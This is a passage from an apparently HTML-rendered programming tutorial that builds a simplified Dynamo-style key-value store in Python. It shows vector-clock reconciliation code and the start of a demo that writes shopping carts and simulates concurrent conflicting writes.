    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;_reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Remove any version that is a causal ancestor of another version.

        If version A&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s clock is dominated by version B&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s clock, then B
        is strictly newer — A adds no new information and can be dropped.

        Whatever remains after pruning are CONCURRENT versions: writes
        that happened without either &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;knowing about&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; the other.
        The application must merge these using domain-specific logic.

        Example:
          versions = [clock={A:1}, clock={A:2}, clock={B:1}]
          {A:2} dominates {A:1}  → drop {A:1}
          {A:2} and {B:1} are concurrent → both survive
          result = [{A:2}, {B:1}]  ← conflict! application must merge
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;dominated&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v1&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v2&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;v2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                    &lt;span class="n"&gt;dominated&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# v1 is an ancestor of v2, discard v1
&lt;/span&gt;
        &lt;span class="n"&gt;survivors&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;dominated&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

        &lt;span class="c1"&gt;# De-duplicate: identical clocks from different replicas are the same version
&lt;/span&gt;        &lt;span class="n"&gt;seen_clocks&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
        &lt;span class="n"&gt;unique&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;survivors&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="nf"&gt;any&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;seen_clocks&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="n"&gt;unique&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="n"&gt;seen_clocks&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;unique&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;unique&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Part 6: Putting It All Together — A Demo
&lt;/h3&gt;

&lt;p&gt;Let's run through a complete scenario: normal write/read, then a simulated conflict where two nodes diverge and the application must merge them.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;demo&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# ── Setup ────────────────────────────────────────────────────────── #
&lt;/span&gt;    &lt;span class="c1"&gt;# Five nodes placed at evenly spaced positions on the hash ring.
&lt;/span&gt;    &lt;span class="c1"&gt;# In a real cluster these would span multiple datacenters.
&lt;/span&gt;    &lt;span class="n"&gt;nodes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-A&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;300&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-C&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-D&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;700&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-E&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;900&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="n"&gt;dynamo&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;SimplifiedDynamo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;55&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SCENARIO 1: Normal write and read (no conflict)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;55&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Write the initial shopping cart
&lt;/span&gt;    &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shoes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]})&lt;/span&gt;

    &lt;span class="c1"&gt;# Read it back — should be a clean single version
&lt;/span&gt;    &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Read result: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Update the cart, passing the context from our earlier read.
&lt;/span&gt;    &lt;span class="c1"&gt;# The context tells Dynamo "this write builds on top of clock ctx".
&lt;/span&gt;    &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shoes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;jacket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]},&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;After update: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;55&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SCENARIO 2: Simulated conflict — two concurrent writes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;55&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Write the base version
&lt;/span&gt;    &lt;span class="n"&gt;base_ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]})&lt;/span&gt;

    &lt;span class="c1"&gt;# Now simulate a network partition:
&lt;/span&gt;    &lt;span class="c1"&gt;# node-A and node-B can't talk to each other.
&lt;/span&gt;    &lt;span class="c1"&gt;# We model this by writing directly to individual nodes.
&lt;/span&gt;
    &lt;span class="n"&gt;pref_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ring&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;node_1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pref_list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;pref_list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;pref_list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# Write 1: customer adds "scarf" via node_1 (e.g., their laptop)
&lt;/span&gt;    &lt;span class="n"&gt;clock_1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base_ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;increment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;node_1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nc"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;scarf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]},&lt;/span&gt; &lt;span class="n"&gt;clock_1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# Write 2: customer adds "gloves" via node_2 (e.g., their phone)
&lt;/span&gt;    &lt;span class="c1"&gt;# This write also descends from base_ctx, not from clock_1.
&lt;/span&gt;    &lt;span class="c1"&gt;# Neither write knows about the other → they are concurrent.
&lt;/span&gt;    &lt;span class="n"&gt;clock_2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base_ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;increment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;node_2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nc"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;gloves&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]},&lt;/span&gt; &lt;span class="n"&gt;clock_2&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# Read — coordinator sees two concurrent versions and surfaces the conflict
&lt;/span&gt;    &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Conflict detected! &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; concurrent versions:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
